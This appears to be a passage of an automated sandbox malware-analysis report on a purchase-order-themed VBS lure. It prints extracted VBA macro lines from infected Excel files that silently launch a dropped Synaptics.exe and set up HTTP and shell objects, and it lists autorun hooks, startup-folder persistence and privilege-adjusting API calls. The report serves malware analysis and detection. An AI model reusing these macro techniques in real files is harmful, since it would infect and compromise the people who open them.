                            Source: YDcMLELS.xlsm.26.dr OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                            Source: YDcMLELS.xlsm.26.dr OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                            Source: YDcMLELS.xlsm.26.dr OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                            Source: YDcMLELS.xlsm.26.dr OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                            Source: YDcMLELS.xlsm.26.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                            Source: YDcMLELS.xlsm.26.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                            Source: QNCYCDFIJJ.xlsm.26.dr OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                            Source: QNCYCDFIJJ.xlsm.26.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: QNCYCDFIJJ.xlsm.26.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: QNCYCDFIJJ.xlsm.26.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: QNCYCDFIJJ.xlsm.26.dr OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                            Source: QNCYCDFIJJ.xlsm.26.dr OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                            Source: QNCYCDFIJJ.xlsm.26.dr OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                            Source: QNCYCDFIJJ.xlsm.26.dr OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                            Source: QNCYCDFIJJ.xlsm.26.dr OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                            Source: QNCYCDFIJJ.xlsm.26.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                            Source: QNCYCDFIJJ.xlsm.26.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                            Source: 1QGQHkIB.xlsm.7.dr Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                            Source: NEBFQQYWPS.xlsm.7.dr Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                            Source: YDcMLELS.xlsm.26.dr Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                            Source: QNCYCDFIJJ.xlsm.26.dr Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                            Source: 1QGQHkIB.xlsm.7.dr Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                            Source: NEBFQQYWPS.xlsm.7.dr Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                            Source: YDcMLELS.xlsm.26.dr Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                            Source: QNCYCDFIJJ.xlsm.26.dr Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                            Source: 1QGQHkIB.xlsm.7.dr Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                            Source: NEBFQQYWPS.xlsm.7.dr Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                            Source: YDcMLELS.xlsm.26.dr Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                            Source: QNCYCDFIJJ.xlsm.26.dr Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                            Source: Open Purchase Order Summary Sheet.vbs Static file information: Suspicious name
                            Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                            Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                            Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
                            Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe Code function: 4_2_004F702F: CreateFileW,DeviceIoControl,CloseHandle,4_2_004F702F
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe Code function: 4_2_004EB9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,4_2_004EB9F1
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe Code function: 4_2_004F82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,4_2_004F82D0
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe Code function: 13_2_00C882D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,13_2_00C882D0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe Code function: 32_2_00B082D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,32_2_00B082D0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AEDF6932_2_00AEDF69
                            Source: 1QGQHkIB.xlsm.7.drOLE, VBA macro line: Private Sub Workbook_Open()
                            Source: 1QGQHkIB.xlsm.7.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                            Source: NEBFQQYWPS.xlsm.7.drOLE, VBA macro line: Private Sub Workbook_Open()
                            Source: NEBFQQYWPS.xlsm.7.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                            Source: YDcMLELS.xlsm.26.drOLE, VBA macro line: Private Sub Workbook_Open()
                            Source: YDcMLELS.xlsm.26.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                            Source: QNCYCDFIJJ.xlsm.26.drOLE, VBA macro line: Private Sub Workbook_Open()
                            Source: QNCYCDFIJJ.xlsm.26.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                            Source: Joe Sandbox ViewDropped File: C:\ProgramData\Synaptics\RCX4FAD.tmp 449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                            Source: Joe Sandbox ViewDropped File: C:\ProgramData\Synaptics\Synaptics.exe E6F8EDCBE69419008B7E54F8554FC1AEC66208DE10C26A982D624EA91AED8092
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: String function: 00AE7750 appears 42 times
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: String function: 00ADF885 appears 68 times
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: String function: 004CF885 appears 68 times
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: String function: 004D7750 appears 42 times
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: String function: 00C5F885 appears 68 times
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: String function: 00C67750 appears 42 times
                            Source: Open Purchase Order Summary Sheet.vbsInitial sample: Strings found which are bigger than 50
                            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8060 -s 3184
                            Source: Machine-PO[1].exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                            Source: Machine-PO[1].exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Source: Google.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                            Source: Google.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Source: Synaptics.exe.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                            Source: Synaptics.exe.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Source: RCX4FAD.tmp.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Source: ~$cache1.7.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Source: ~$cache1.26.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Source: classification engineClassification label: mal100.troj.adwa.expl.evad.winVBS@30/79@12/5
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004FD712 GetLastError,FormatMessageW,4_2_004FD712
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004EB8B0 AdjustTokenPrivileges,CloseHandle,4_2_004EB8B0
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004EBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,4_2_004EBEC3
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C7B8B0 AdjustTokenPrivileges,CloseHandle,13_2_00C7B8B0
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C7BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,13_2_00C7BEC3
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AFB8B0 AdjustTokenPrivileges,CloseHandle,32_2_00AFB8B0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AFBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,32_2_00AFBEC3
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004FEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,4_2_004FEA85
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004F6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,4_2_004F6F5B
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004FEFCD CoInitialize,CoCreateInstance,CoUninitialize,4_2_004FEFCD
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004B31F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,4_2_004B31F2
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
                            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exe
                            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8060
                            Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:120:WilError_03
                            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7732
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeFile created: C:\Users\user\AppData\Local\Temp\._cache_Google.exe
                            Source: Yara matchFile source: 3.0.Google.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000003.1491991054.000001C7E4325000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1489527572.000001C7E5148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1488585616.000001C7E54BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\Documents\LSBIHQFDVT\~$cache1, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX4FAD.tmp, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\Documents\IPKGELNTQY\~$cache1, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe, type: DROPPED
                            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Sheet.vbs"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
